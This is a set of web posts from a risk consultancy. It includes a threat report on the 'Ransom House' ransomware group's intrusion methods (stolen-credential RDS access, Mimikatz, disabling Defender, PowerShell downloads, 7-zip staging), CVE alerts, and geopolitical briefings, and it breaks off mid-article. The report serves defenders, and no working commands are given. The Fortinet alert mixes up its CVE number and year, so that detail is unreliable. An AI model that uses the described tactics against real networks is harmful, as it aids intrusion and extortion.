A Comprehensive Analysis of a Formidable Ransomware Threat

Unmasking “Ransom House”

Man Holding Padlock

Overview

A detailed investigation conducted by Solace Cyber into the tactics, techniques, and procedures used by the “Ransom House” ransomware group reveal a sophisticated approach to cyber attacks, including initial network access through compromised credentials, extensive use of tools like PowerShell and Mimikatz, and strategic persistence mechanisms. 

As well as insights into the group’s tactics and operations, this report offers preventative recommendations that can help you better understand and manage your organisation’s risk profile.

Report Findings

Extensive experience in the investigation of attacks by the “Ransom House” ransomware group has provided a comprehensive understanding of the tactics, techniques, and procedures, adopted by this threat actor during their attacks.

In terms of initial (network) access, the threat actor is known to make use of compromised credentials to access the network through RDS gateways, with cyber threat intelligence linking the IP addresses used by the threat actor to that used by numerous, other ransomware/malware-related affiliates, such as “Medusa” and “Meduza Stealer”. In terms of compromised account usage, “Ransom House” will leverage any available credentials to pursue initial access, irrespective of whether these are local, or administrative-level, accounts, particularly where weak ingress points, such as an RDS gateway, are concerned. Although the threat actor routinely installs other RMM tools to maintain network access, in the absence of the initial attack vector being identified, it has been seen that the threat actor will continue to use the original method of access.

In terms of command and control and the ability to maintain a route into the network, “Ransom House” are known to implement multiple methods – as a means of redundancy – to maximise their chances of maintaining access. Analysis of numerous breaches has identified a number of tools used as persistence mechanisms, including “resocks” and “TeamViewer”, with the threat actor installing these across different servers within the compromised network. Regarding the introduction of such tools into the compromised network, it has been determined from forensic analysis that the threat actor will utilise PowerShell to download tools from file sharing sites, including “hxxp://bashupload.com”, where the required files are uploaded, and a specific link generated to facilitate downloading as and when required.

To support efforts around credential access, the threat actor is known to make extensive use of  the credential dumping utility “Mimikatz”. Forensic investigation and timeline analysis has established that prior to undertaking this attack phase, the threat actor will deploy defence evasion techniques, including disabling Defender “Real Time Protection”, to ensure the deployment of credential access tooling is not detected and blocked by antivirus software. Additional identified credential access techniques include the execution of bespoke PowerShell scripts to target specific systems, including Veeam backup servers, which have been reverse engineered and shown to retrieve and decrypt passwords from targeted servers. Once this objective has been achieved, it has been identified that the threat actor will utilise the credentials to use accounts with elevated permissions, such as administrator accounts, to advance lateral movement through the target environment. Following on from this, use of network discovery tools is commonplace, with “Advanced IP Scanner” routinely identified across an infected environment. The threat actor has also been observed to interrogate browsers to obtain IP addresses for ESXi hosts and vSphere datastores to advance their understanding of the victim network and identify the location of key servers for ransomware deployment.

Regarding data collection, extensive analysis of “Ransom House” ransomware attacks has identified the use of “7-zip” as a key tool to support data exfiltration. The threat actor will install this into non-standard directory locations, such as “Pictures” and “Documents”, in an attempt to obfuscate this activity and prevent detection. Allied to the use of “7-zip” is the use of PowerShell to execute commands, such as the aforementioned downloading of files, the installation of modules, change of passwords, as well as ransomware execution. By way of example, the following commands have been identified across several attacks across virtualised environments:

It has been seen that the threat actor will stage on the domain controller to deploy encryption across VMware datastores. In terms of encryptors, recent “Ransom House” attacks have seen the detonation of the “emario” encryptor against virtual disks (files renamed with “.emario” extension), with a ransom note entitled “How To Restore Your Files.txt”. Additional deployment of the “White Rabbit” encryptor has also been identified executed against domain controllers.  File extensions are modified with underscores, i.e.,  a “.docx” file would become “.doc_”,  with ransom notes named “!!READ_ME!!” being placed across the file system.

Unified Kill Chain Overview

Using the Unified Kill Chain model, the attack can be split into three distinct phases:

  1. In: The method(s) used by the attackers to gain access to the network.
  2. Through: The method(s) used by the attackers to navigate through the network.
  3. Out: The method(s) used by the threat actor to use network access to monetise the attack

Timeline

Indicators of Compromise

The following table contains a combined view of relevant indicators of compromise (IOCs) found during the forensic analysis undertaken by Solace Global Cyber.

Preventative Recommendations

Solace Global Cyber has created a complimentary risk assessment that enables any UK organisation to understand its risk profile against ransomware.

Solace Global – Cyber Risk Assessment

General Guidance:

  • Endpoint Detection & Response (EDR) technologies, correctly setup in anti-evasion mode and with anti-evasion techniques. This needs to be monitored 24/7 by specialists that can react to situations in quick SLA times.
  • Anti-Virus and EDR will be evaded by these groups if not setup correctly, ensure you ask your provider how your existing solution will prevent ransomware groups evading or turning of these technologies. Monitor the positions of you AV or EDR this is an early detector of ransomware when devices are turned off or not reporting in.
  • Monitor your AV alarms, when Solace runs forensics there is so many IOC detected even if the AV is inhibited. Don’t trust your MSP and suppliers, always challenge them that you are truly being protected.
  • BackUp – Ensure your backups are air gapped and immutable. Ensure that you test your backups are happening at the correct frequency.
  • Multi-Factor Authentication (MFA) email and all remote access points.
  • Network monitoring either via SIEM or a suitable technology for your specific firewall.
  • Use a single remote access tool so that any new ones are easier to detect.
  • Solace also recommends signing into the NSCS Early Warning System which is free to compliment your security posture.
  • Be ready for the worst case and have a business incident response plan so that the organisation as a whole is prepared for such an attack.
  • Segment your network to limit and control risks.
  • Ensure strong passwords in use.
  • Ensure your estate is patched and End of Life systems are not in play.
  • Phishing training on a regular basis of staff. Help staff become the strongest line of defence by building the right cyber culture.

If you are experiencing a cyber attack from this group please contact Solace Global Cyber and we will provide you with complimentary guidance and technologies to assist you.  

Experiencing a Cyber Attack?

Solace Cyber can provide complimentary guidance and technologies to assist you.

    Slovak Leader Fico Survives Assassination Attempt

    Slovak Prime Minister Robert Fico is in a serious but stable condition following a suspected assassination attempt. The attack occurred on May 15 in the small town of Handlova, where Fico was meeting supporters outside a cultural centre. He was shot multiple times and immediately rushed to F. D. Roosevelt University Hospital in Banska Bystrica. After undergoing a five-hour surgery, he is currently in intensive care.

    The alleged suspect, a 71-year-old writer and political activist, was detained at the scene. Authorities are investigating the motive behind the attack, which is widely believed to be politically motivated.

    Fico, who secured office in October 2023 after a divisive campaign, has been a polarising figure. He is one of the few European leaders advocating for closer ties with Russia and has called for an end to the EU’s military support for Ukraine. Under his leadership, Slovakia has halted all arms deliveries to Kyiv.

    Fico’s government has made controversial moves, including a proposal to abolish the country’s public broadcaster and weaken anti-corruption laws. These actions have sparked fears about media independence and democracy in Slovakia, leading to widespread protests. Some believe these tensions contributed to the assassination attempt, with Fico’s ruling SMER party blaming false narratives from the opposition.

    The attack on Prime Minister Fico is expected to lead to heightened security measures across Slovakia. In the long term, this incident might be used to justify suppressing dissent and pushing through more contentious government proposals. Additionally, Russian-affiliated social media accounts have been spreading information suggesting Ukrainian or NATO involvement, with some posts inciting violence against European officials.

    Former Russian President Dmitry Medvedev has hinted that the attack could be linked to Fico’s stance on Russia. While the risk of terrorism in Slovakia remains low, there is a realistic possibility of targeted violence and harassment against pro-EU Slovakian officials in the coming weeks.


    READ MORE

    2024 Intelligence Forecast: The Populist Wave and Polarisation in Europe in 2024

    The rise of both far-right and far-left political parties in Europe in recent years has significantly complicated and energised the political landscape in the continent. This trend is expected to persist into 2024.


    Nakba Day 2024

    Anticipated Disruption Across North Africa, Europe and North America

    Intelligence cut off time 10:00 GMT 14th of May 2024

    This Wednesday, May 15, commemorates the 76th anniversary of the Nakba, an Arabic term meaning “catastrophe.” It signifies the expulsion and forced displacement of around 750,000 Palestinian Arabs during the 1947-1949 Palestine War, following the adoption of the UN’s Partition Plan for Palestine, which ended British mandate rule over the territory. This event is profoundly significant historically, marking the onset of the Palestinian diaspora and a pivotal moment in the formation of Palestinian national identity, which persists nearly a century later.

    This year, the significance of the commemoration will be amplified due to the ongoing war in the Gaza Strip. The conflict has reached a critical juncture, especially with the recent deployment of Israeli troops into Rafah on May 6th. The conflict, which followed a surprise attack launched by the Gaza Strip-based Hamas terror group on 7 October, and resulted in the killing of approximately 1,200 Israelis, mostly civilians, has entered its seventh month. During this time, over 35,000 Palestinians, mostly civilians, have lost their lives, and nearly two million have been displaced internally. Gaza is grappling with severe famine, a near-total collapse of infrastructure, and extensive destruction of local housing.

    This year’s Nakba Day is expected to spark extensive protests and disruptions, especially in North Africa, Europe, and North America. While some events may be sanctioned by authorities or even state-sponsored, there’s a significant risk of clashes with security forces. In regions with substantial pro-Israel support, tensions may escalate between pro-Palestine demonstrators and counter-protesters, potentially leading to property damage targeting individuals associated with either side.

    Universities are expected to be significant focal points for civil unrest. Across the globe, student occupations and protests authority have occurred in various academic institutions, notably in France, the United States, and the Netherlands. In Tel Aviv, authorities recently prohibited a planned Nakba commemoration event, potentially triggering anti-government demonstrations and clashes in the city. Student movements, while typically localised, can disrupt city centres in major urban areas.

    The risk of terrorism, particularly from self-radicalised individuals or “lone wolves,” presents a significant threat, especially in densely populated urban areas. These lone actors may target large gatherings or individuals and locations with simple weapons like knives or occasionally light firearms. Vehicle attacks are also a possibility, although their effectiveness varies due to anti-vehicle barriers in many city centres.

    While organised terror group attacks are less common, they are not impossible. For instance, in Alexandria, Egypt, on May 7th, a Jewish businessman was killed by a group named ‘Vanguards of the Liberation – the Martyrs of Mohamed Salah’, linked to an incident involving an Egyptian police officer killing three Israel Defense Forces (IDF) soldiers in 2023. Attacks by groups are often more sophisticated and may involve improvised explosive devices (IEDs), but they also have a higher chance of being thwarted by authorities compared to lone wolf attacks.

    Nakba Day-related disruptions are expected to primarily impact large urban centres in countries that have seen significant pro-Palestine protests. These disruptions are likely to concentrate around government or academic institutions, limiting their scope. Avoiding these areas unless necessary should mitigate physical risks.

    However, traffic disruptions, potentially affecting various modes of transportation, are less predictable and could have more widespread effects. While disruptions to airports and seaports are unlikely, protesters may attempt to block roads, particularly around targeted buildings and main traffic arteries leading into urban centres. Even brief disruptions could have lasting effects throughout the day.

    To minimise such risks, it’s recommended to schedule travel outside of rush hour and to plan entry into large cities prone to protests for early morning hours. If traveling through city centres is unavoidable, consider alternative routes away from likely protest areas and avoid public transportation.

    It’s crucial to stay informed through official channels regarding potential protests, disruptions, and violence. Familiarise yourself with local emergency contacts, including nearby police stations and emergency rooms. When planning business operations, establish clear communication procedures such as two-way messaging networks and GPS tracking to reduce risks to people and assets.

    Additionally, having failover systems and strategic redundancies in place can mitigate the impact of severe localised disruptions on primary business operations, although such scenarios are unlikely.


    Solace Global Risk is a leading provider of comprehensive risk management solutions, serving clients globally with a commitment to excellence. Our team of seasoned experts, empowers organisations to navigate complex risk landscapes with confidence and resilience.

    Journey Risk Management

    Your duty of care doesn’t end the moment your people set foot in their destination – and neither does ours.

    From transfers to ongoing security and emergency evacuations, our travel risk services always have you covered. 

    Arm yourself with the knowledge to avoid a potential threat from turning into a crisis. Intelligence advisories give you tailored reports to anticipate possible disruptions, mitigate risk and help you make well-informed decisions, faster.

    Give your people peace of mind when they travel for work, so they remain focused on the job at hand. We mitigate risks, manage incidents if they occur, and support your people with security advice or help in a crisis. 


    Speak to a risk management specialist

      US Expansion for Solace Global Risk

      Solace Global Risk announces further expansion into the United States market and proudly appoints Brent Borawski as Vice President of Sales and Business Strategy.

      Brent Borawski - Solace Global Headshot

      Brent Borawski brings 25 years of invaluable experience in the Insurance and Risk Management sector and has already seen a surge in requests from US organizations that require a more tailored approach to risk management.

      Brent comments that “Many organizations are rightfully asking ‘what happens if we are impacted, and are we truly ready to react in a crisis?’

      He goes on to say “The sentiment amongst leaders in security is shifting…

      …Resources and budgets are tightening, all while requirements increase due to higher levels of global instability. Now many are assessing whether their current suppliers are providing the best value and innovative technology that truly align with their processes.

      Gone are the days when integrating a platform is simply a box-ticking exercise for duty of care obligations. Clients expect a better level of service and have the assurance providers can go the extra mile in a crisis.”

      This strategic move marks a significant milestone for Solace Global Risk and underscores its unwavering commitment to delivering exceptional customer service that surpasses expectations.


      Emily Roberts Managing Director Solace Global Risk

      Emily Roberts

      Managing Director, Solace Global Risk

      “We are thrilled to bring Solace’s unique vision and solutions to the US market.

      With 14 years of experience serving clients across various industries, we have witnessed firsthand the increasing demand for tailored solutions to mitigate risks and ensure business continuity. Our entry into the US market underscores our commitment to meeting the unique needs of American businesses by providing innovative, client-focused risk management services. 

      Whether you are navigating geopolitical uncertainties, ensuring the safety of your personnel during travel, or safeguarding your assets against emerging threats, Solace Global is here to support you every step of the way. 

      We are poised to collaborate and provide expertise to US-based organizations seeking advanced risk management solutions and unparalleled support.”


      Solace Global Risk is a leading provider of comprehensive risk management solutions, serving clients globally with a commitment to excellence. With a dedicated US presence and a team of seasoned experts, Solace Global Risk empowers organisations to navigate complex risk landscapes with confidence and resilience.

      Journey Risk Management

      Diligent in-country travel security

      Be one step ahead to prevent a crisis

      Travel with confidence

      Your duty of care doesn’t end the moment your people set foot in their destination – and neither does ours.

      From transfers to ongoing security and emergency evacuations, our travel risk services always have you covered. 

      Arm yourself with the knowledge to avoid a potential threat from turning into a crisis. Intelligence advisories give you tailored reports to anticipate possible disruptions, mitigate risk and help you make well-informed decisions, faster.

      Give your people peace of mind when they travel for work, so they remain focused on the job at hand. We mitigate risks, manage incidents if they occur, and support your people with security advice or help in a crisis. 


      Solace Global
      418 Broadway
      #5011 Albany
      NY 12207


      Connect with Solace Global Inc.

        CVE-2024-3400

        Cyber Security Alert: GlobalProtect Gateway Zero-Day Vulnerability

        Security Vulnerability

        Overview: Palo Alto has announced a critical zero-day vulnerability that is actively being used in the wild.

        Threat Name: CVE-2024-3400

        Risk Factor: Critical

        Date: April 2024

        Get Help Now

        Solace Cyber security specialists can assist with updating your firewall to the latest version.

        What We Know

        CVE-2024-3400 represents a critical command injection vulnerability impacting the GlobalProtect Gateway functionality within PAN-OS. This flaw could be exploited by a remote, unauthenticated attacker to execute arbitrary code on a targeted firewall, granting them root privileges. The vulnerability has been categorised as critical as it poses a significant risk.

        What Has Palo Alto Said?

        Palo Alto Networks has acknowledged the issue and is working on a patch for CVE-2024-3400. Fixes are starting to become available. Not all versions of PAN-OS have a patch yet, so the advisory is to keep an eye on the Palo Alto Network official site. 

        Palo Alto Networks has also acknowledged that it’s “aware of a limited number of attacks that leverage the exploitation of this vulnerability.”

        According to Palo Alto, the issue applies only to firewalls that have the configurations for both GlobalProtect gateway (Network > GlobalProtect > Gateways) and device telemetry (Device > Setup > Telemetry) enabled.

        Recommendations For Navigating The Vulnerability.

        When a vulnerability is identified, it’s crucial to take swift action to mitigate any potential risks. Specifically, for PAN-OS versions prior to:

        • PAN-OS less than 11.1.2-h3
        • PAN-OS less than 11.0.4-h1
        • PAN-OS less than 10.2.9-h1

        It’s highly recommended to prioritise patching as soon as the updates are released. These patches are vital for bolstering the security of your systems and safeguarding against potential exploitation.

        As an interim measure, disabling device telemetry can serve as a temporary workaround until an official patch is made available. This step can help minimise exposure to vulnerabilities while awaiting the official fix.

        Remaining vigilant is key. Continuously monitor official communications from Palo Alto Networks for any updates regarding the vulnerability and subsequent patches or mitigations. As soon as updates are released, promptly apply them to your systems to ensure optimal security posture.

        It’s imperative to update your firewall to the latest version at the earliest opportunity. Solace Cyber stands ready to assist with this process, ensuring your firewall is promptly updated to the most recent version, thereby fortifying your defenses against potential threats.

        Need support?

        Solace Cyber security specialists can assist with updating your firewall to the latest version

          Announcement from Solace Global

          It is with great sadness that we confirm that seven humanitarian aid workers, including three security personnel from Solace Global, were tragically killed on Monday evening following a strike on World Central Kitchen’s humanitarian mission, delivering food aid to those in need in Gaza. 

          Words cannot express the depth of sympathy that we feel for the families, friends, colleagues and loved ones of those who died. We are working closely to support them at this difficult time. 

          We are humbled by the bravery of the men and women working in such complex environments to deliver vital aid, and pay tribute to those that lost their lives on Monday. Those who knew John, James and James have expressed pride for them enabling humanitarian efforts. 

          We are committed to supporting the families and loved ones of those who died, and remain dedicated to the continuation of services for all of our clients.

          Solace Global at ASIS Europe 2024

          We are excited to announce that we will be exhibiting at ASIS Europe 2024 in Vienna, where we will be showcasing our risk management solutions aimed at navigating the complexities of today’s global security landscape and building business resilience.

          We are excited to exhibit alongside top security firms and engage with esteemed professionals and emerging leaders in the industry.

          Visit our stand B8 to connect with our experts, learn more about our industry leading risk management platform, Solace Secure, and find out how Solace Global can help you strengthen your business resilience.


          Event details

          When

          March 21-22, 2024

          Where

          Vienna, Austria


          Emily Roberts Managing Director Solace Global Risk

          Emily Roberts

          Managing Director, Solace Global Risk

          “In a world marked by geopolitical uncertainties and evolving threats, it’s imperative for businesses to prioritise resilience. This means not only having robust security measures in place but also the agility to adapt and respond swiftly to emerging challenges. At Solace Global, we recognise the growing demand from European organisations for comprehensive security solutions tailored to their specific needs.”


          Connect with us at ASIS Europe 2024

          Share your details below and we’ll get in touch to book a timeslot during the event.

            CVE-2024-21762

            Cyber Security Alert: Fortinet Warns of Critical FortiOS SSL VPN Flaw

            fortinet logo

            Overview: Fortinet Warns of Critical FortiOS SSL VPN Flaw Likely Under Active Exploitation. Immediate action required.

            Threat Name: CVE-2023-20198

            Risk Factor: Critical

            Date: 9th Feb 2024

            Get Help Now

            Solace Cyber security specialists can assist with updating your firewall to the latest version.

            What We Know

            On February 8, 2023, Fortinet issued a notice addressing a potentially exploited vulnerability in the wild. This vulnerability, found in the SSL VPN component, is classified as a pre-authentication vulnerability, with a critical severity rating of 9.6 CVSSv3. The identified flaw could enable a remote attacker to authenticate remotely by employing carefully crafted HTTP requests. Subsequently, the attacker may execute arbitrary code or commands, as reported by Fortinet.

            What Has Fortinet Said About The Vulnerability?

            Fortinet has emphasised that the only viable solution is to disable the SSL VPN entirely; opting to deactivate webmode is not considered a valid workaround. Urgent action is advised to promptly patch this vulnerability.

            The affected versions and recommended solutions for FortiOS are as follows:

            • FortiOS 7.6 is not affected, and no action is required (Not Applicable).
            • FortiOS 7.4 versions ranging from 7.4.0 through 7.4.2, users are advised to upgrade to version 7.4.3 or above.
            • FortiOS 7.2 with versions between 7.2.0 and 7.2.6, it is recommended to upgrade to 7.2.7 or above.
            • FortiOS 7.0 users with versions from 7.0.0 through 7.0.13 should upgrade to 7.0.14 or above.
            • FortiOS 6.4, versions 6.4.0 through 6.4.14, an upgrade to version 6.4.15 or above is recommended.
            • FortiOS 6.2 users with versions ranging from 6.2.0 through 6.2.15 are advised to upgrade to 6.2.16 or above.
            • FortiOS 6.0 in all versions, it is recommended to migrate to a fixed release.

            What’s The Impact and Implementation Plan?

            The flaw allows an attacker to remotely authenticate using crafted HTTPS requests. According to vuldb.com, technical details are unknown, but an exploit is available.

            Swiftly upgrade your firewall to the most recent update. Solace Cyber is available to help you with the process of updating your firewall to the latest version.

            Need support?

            Solace Cyber security specialists can assist with updating your firewall to the latest version

              Alert Plus: US and UK launch air strikes on Houthi targets in Yemen

              Current Situation of US and UK air strikes in Yemen

              Intelligence cut off time 15:00 GMT 12th of January 2024

              On the 11-12 January, US and UK aircraft and warships conducted at least 70 strikes on multiple military targets in Houthi-controlled Yemen. Reports indicate that over 100 precision guided munitions were fired on at least 16 Houthi locations. This includes a military base adjacent to Sanaa airport, a military site near Taiz airport, a Houthi naval base in Hodeidah and military sites in Hajjah governorate. Houthi’s stated that five of the group’s fighters were killed in the strikes with six others wounded.

              The US Secretary of Defense, Lloyd J. Austin III, released a statement indicating that targeted strikes were conducted on sites associated with unmanned aerial vehicle’s (UAV), ballistic and cruise missiles, and coastal radar and air surveillance capabilities.

              Majority of the firepower came from US jets, with the US having the aircraft carrier USS Dwight D Eisenhower already in the Red Sea, as well as air bases in the region. US Navy warships also fired Tomahawk land attack cruise missiles (LACMs), which are GPS-guided and can be programmed to fly evasively. The UK contributed by sending four RAF Typhoons from Akrotiri, Cyprus, carrying Paveway IV guided bombs.

              Map of US and UK Air Strikes against Houthi's in Yemen January 2024
              Map of US and UK Air Strikes against Houthi’s in Yemen

              In response, the Houthis have stated that they are not deterred by the attacks. The group’s leader, Mohammed al-Bukhaiti, stated that the US and UK would “soon realise” the action was “the greatest folly in their history”. Hezbollah, Hamas, and the Palestinian Islamic Jihad responded by saying that the strikes show Washington and London’s support for Tel Aviv and that the West are now responsible for the subsequent impact on the region’s security. Iran also responded forcefully, expressing that the strikes were a breach of international laws. Saudi Arabia and Jordan did not condemn the attacks but did call for restraint. Several Western nations supported the operation as an attempt to restore the free flow of trade and deter further Houthi attacks.

              Who is Behind The Houthi Movement?

              The Houthi Movement is an Iranian aligned group that controls much of Yemen after nearly a decade of civil war against a Western-backed and Saudi-led coalition. The two sides are currently observing a tentative ceasefire that officially ended in late 2022 but has remained in place to the current day.

              Following the outbreak of the Hamas-Israel conflict, the Houthi’s emerged as a strong supporter of the Palestinian Islamist group. The Houthis began attacks on shipping between the Gulf of Aden and the Red Sea in December 2023, claiming to target vessels linked to Israeli persons, businesses, and interests.

              However, this route, which links Europe and Asia and Africa via the Suez Canal, accounts for roughly 15 percent of the world’s shipping traffic. The attacks have forced some shipping companies to limit transits through the waterway, or even cease operations altogether, instead taking the longer route around southern Africa. This has significantly disrupted international commerce, increasing delivery costs and time, stoking fears about a global inflation.

              In response to the Houthi attacks, the US launched Operation Prosperity Guardian alongside several allies, which aimed to end the blockade and counter all threats by Houthi forces against international maritime trade. The operation was defensive in nature, destroying only missiles launched at vessels with no pro-active strikes conducted. The Houthis continued to fire at merchant vessels, as well as allied naval vessels, dismissing warnings from Washington and London. Then on 9 January, US and British warships shot down 21 drones and missiles, repelling the largest Houthi attack so far.

              How will UK and US airstrikes in Yemen affect global stability?

              It is highly likely that the Houthi’s largest attack to date on 9 January was the trigger that surpassed the US-UK threshold. While international prices have yet to see a significant impact, Operation Prosperity Guardian was not working as a deterrent. It is highly likely that more extensive, continued Houthi action would force more merchant vessels away from the Red Sea, almost certainly disrupting maritime trade, therefore increasing consumer prices and shortages.

              In the immediate aftermath, the Houthi’s are highly likely to increase their attacks on commercial and military vessels in the region in retaliation. However, it is likely that their ability to launch missiles and drones has been degraded. Should the Houthis sustain their attacks, it is almost certain that the US and UK will continue their strikes on targets within Yemen. It is also highly likely that the group will be re-designated as a terrorist organisation if they continue. This would have a significant impact on the peace process to end the Yemeni Civil War between the Houthi’s and the Saudi-led coalition, which has continued to progress despite regional tensions.

              A breakdown of the process would almost certainly see a resumption of hostilities between the two sides, with locations within Saudi Arabia and the United Arab Emirates likely becoming viable targets for the Houthi’s as evidenced by their previous attacks.

              Across the Middle East, it is highly likely that Houthi’s allies and other Iranian proxies start to act in solidarity with the group. These groups will almost certainly view the attacks as Western support for Israel.

              It is almost certain that Popular Mobilisation Forces (PMF) in Iraq and Syria will continue to target US military bases across the region. It is also likely that the frequency and scale of these attacks will increase considerably. There is a realistic possibility that US military locations that have not been targeted yet in Kuwait, Saudi Arabia, and the UAE, are targeted.

              Hezbollah will likely continue to focus its attacks on Israel, however an attack on the US cannot be ruled out. While still unlikely, the US and UK strikes on Yemen have increased the likelihood of a wider conflict developing in the Middle East, as well as the West entering a proxy war with Iran. This eventuality would highly likely take focus away from the conflict in Gaza, almost certainly intensifying the humanitarian situation.

              Travel Risk Advice

              • Avoid all non-essential travel to Yemen.
              • Anyone operating in the region should monitor events from a reliable source in case of a major escalation.
              • Key military and political infrastructure inside Sana’a are very likely to remain focal points for violence and demonstrations. You should be particularly vigilant in these areas and follow any specific advice from the local security authorities.
              • Avoid US and UK embassies or consulates across the region as these will likely be the epicentres for demonstrations.
              • If air-raid or rocket warning sirens are sounded, seek secure shelter immediately, ideally in a purpose-built shelter. If in a building when sirens are sounded, head to a secure room, stairwell or inner room. Close all windows and doors, stay in shelter for ten minutes after the siren ends.
              • If hostilities resume between the Houthis and the Saudi-led coalition, key civilian and military installations in Saudi Arabia and the UAE will likely become targets. Avoid these locations if not essential.
              • Previous Houthi attacks have targeted major airports. Ensure alternative travel plans have been prepared for, as well as all individuals having comprehensive travel insurance.
              • Mariners in the region should proceed with extreme caution, maintaining contact with port and shipping authorities at all times.
              • Always follow all instructions and orders from security forces. ​Where possible, avoid areas of active conflict and remain inside a secure location away from windows.
              • Ensure that you always carry personal identification documents. Consider making photocopies of important documents in case of confiscation, theft or loss.Keep these documents separated from the originals.​​
              • Have emergency contact numbers saved on your phone. These should include the local authorities, medical facilities and any consular support. Ensure that mobile phones are charged in case of any losses in electricity.
              • If caught in the vicinity of a security incident, seek shelter immediately and leave the area if safe to do so. Continue to adhere to all instructions issued by authorities and obey any security cordons in place. 
              • Monitor the Solace Secure platform and trusted local media for relevant updates.


              More on the recent activity in the region

              Houthi Attacks in the Red Sea

              Since the start of the Israel-Hamas war, the Houthi Movement has supported the Palestinian cause by targeting southern Israel directly and Israeli-linked vessels on shipping routes in the Gulf of Aden, Red Sea, and the Bab-al-Mandeb.

              Houthi Seizure of Merchant Vessel Galaxy Leader

              In a brazen incident on 19 November, the Galaxy Leader, a Bahamian-flagged and Japanese-operated merchant vessel (IMO: 9237307), fell victim to suspected Houthi Movement militants in the Southern Red Sea.

              Israel-Hamas War 2023

              With the incursion into southern Israel by the Gaza-based militant group Hamas over the weekend of 7 and 8 October, this eventuality became a reality, and the region is now on the precipice of a protracted and deadly conflict.


              Speak to our team about your journey management needs

                Solace Cyber Recognised as Assured Service Provider by National Cyber Security Centre.

                Solace Cyber, a leading Cyber Security organisation with headquarters in Dorset, has achieved recognition as an Assured Service Provider under the prestigious Cyber Incident Response (Level 2) scheme by the National Cyber Security Centre (NCSC). This accolade positions Solace Cyber among the first in the UK to attain Incident Response accreditation through the scheme, highlighting their commitment to providing high-quality incident response services.

                The NCSC’s Cyber Incident Response project aims to offer support to UK organisations that have fallen victim to cyber-attacks, by raising awareness of high-quality incident response providers who can offer external support and advice on how to manage and recover from cyber incidents.

                The initiative builds on the Level 1 scheme, which was developed to assure companies that have the capability to provide incident response services to nationally significant organisations such as regulated industries, central government, and critical national infrastructure.

                With an impressive track record, Solace Cyber has been instrumental in helping companies across the UK recover from ransomware attacks and data breaches. Serving as representatives for International Loss Adjusters and Cyber Insurance companies, Solace covers more than 30,000 commercial businesses nationwide, through our channels, providing hundreds of successful response recoveries.

                Rowland Johnson, President of CREST said, “Congratulations to Solace for gaining NCSC Cyber Incident Response (Level 2) scheme Assured Service Provider status for its incident response services. This means Solace has been assessed as capable of supporting most organisations with common cyberattacks, such as ransomware. It provides valuable assurance to buyers of the high quality of Solace’s incident response services.”

                This prestigious accreditation reaffirms Solace Cyber’s dedication to meeting the NCSC’s stringent standards for both technical and organisational capability. By achieving the Cyber Incident Response (Level 2) status, Solace Cyber continues to demonstrate its unwavering commitment to enhancing the cybersecurity landscape and providing unparalleled support to organisations facing the challenges of cyber threats.

                For media inquiries, please contact: rbessant@solaceglobal.com

                Incident Response Services

                Security in Dubai, UAE and COP28 Climate Change Summit

                The United Nations Climate Change Summit, COP28 will be hosted in Dubai at the end of the month to bring together global leaders in an effort to take action against climate change.

                The Middle East, with its vast energy resources, intricate alliances, and ongoing conflicts, plays a crucial role in the global energy landscape, and the consequences of regional conflicts and geopolitical dynamics in the area have far-reaching implications for the world’s environmental and sustainability goals.

                However, in addition to the long-standing geopolitical tensions and conflicts, the Israel-Hamas war holds the potential to heighten tensions and detract from the success of this summit, with the likely possibility of an increasing security risk to Westerners travelling to Dubai.

                In this article:

                Security factors during COP28 in Dubai

                Many Israeli climate organisations have stated that they will boycott COP28 and it is highly likely that Israel will be forced to withdraw from COP28 entirely due to security concerns.

                However, COP28 will still attract thousands of Westerners, including many world leaders, diplomats and influential businesspeople. It is likely that COP28 represents an attractive target for terrorist actors due to the influx of foreigners and the international publicity of the event.

                On 29 October, the UK’s Foreign, Commonwealth & Development Office (FCDO) issued a warning for British tourists visiting the United Arab Emirates (UAE), indicating an increased threat of terrorist attacks. The advisory warns of a very likely risk of terrorist attacks, which could be indiscriminate and may target places frequented by foreigners. While terror attacks within the UAE and rare and the Emirati counter-terrorist forces are heavily financed and well-trained, there is a realistic possibility that forces will be overstretched as a result of COP28 and that self-radicalisation within the region will increase as a result of the situation in the Gaza Strip.

                Background on Houthi Movement in Yemen

                In 2004, the Iranian-backed Houthi Movement, otherwise known as Ansar Allah (Supporters of God), rebelled against the Yemeni government with the aspiration of taking control over the entirety of Yemen. The conflict escalated in 2014 when Houthi forces seized Yemen’s capital, Sanna, and forced the Yemeni government into exile. This led to the deployment of a Saudi-led coalition in 2015 that seeks to establish full territorial control by the internationally recognised government within Yemen.

                The Saudi-led coalition consists of predominantly Sunni and Arab nations such as the UAE, and is backed by Western powers including the USA, UK and France.

                UAE’s involvement in the Yemen conflict

                The UAE’s involvement in the coalition has involved a range of military and logistical support for the government of Yemen, including air strikes, the deployment of troops to Yemen and training local Yemeni militias allied to government forces.

                The UAE’s involvement in the conflict has made it a target for Houthi forces who have developed an arsenal of long-range drones and missiles facilitated by Iran. Houthi forces have conducted numerous drone and missile attacks on the UAE, typically targeting strategic locations in Abu Dhabi and Dubai, such as airports, ports and oil facilities.

                Since 2019, the UAE has significantly reduced its military footprint in Yemen, however it still projects power through its support of a number of militias allied to Yemeni government forces. The Houthis have conducted attacks on the UAE in response to successful military operations by pro-government militias supported by Abu Dhabi, which resulted in a series of high-profile attacks in 2022 against high-profile targets in Abu Dhabi and Dubai.

                While the UAE maintains a sophisticated air-defence capability and has been able to shoot down the majority of projectiles within its airspace, it is likely that the Houthis have sufficient drones and missiles to overwhelm and penetrate UAE air defence.

                The Houthi Movement have currently been in talks with Saudi Arabia and other local actors regarding a ceasefire.

                Potential for further destabilisation triggered by the Israel-Hamas War?

                There is a realistic possibility that the Israel-Hamas war destabilises the Middle East, and Iran exploits the situation to order its proxy forces to attack Israeli, Western and anti-Iranian forces and interests throughout the region.

                Houthi forces have attempted drone and missile attacks on Israel in response to the Israel Defence Forces (IDF) military activity in the Gaza Strip, with all attacks to date intercepted by IDF or US air defence.

                There is a realistic possibility that both Saudi and the UAE will be forced to respond to Houthi attacks which will invariably provoke retaliatory attacks from the Houthis. Moreover, there is also a realistic possibility that the Houthi rebels might seek to exploit the current situation in the Middle East to conduct attacks on the UAE.

                In the event of a wider conflict involving Israel, the Houthi rebels could exploit regional tensions to launch missile and drone attacks, engage in cyber warfare, and employ asymmetric tactics against the UAE, aiming to distract or pressure the UAE due to its involvement in regional security initiatives and the Saudi-led coalition.

                A further motivation for the Houthis, who are backed by Iran and reportedly allied to Hezbollah, would be to present themselves as defenders of the Palestinian cause and target the UAE for its recent normalisation of relations with Israel and ties to the West.

                Potential outcomes for security in Dubai and UAE

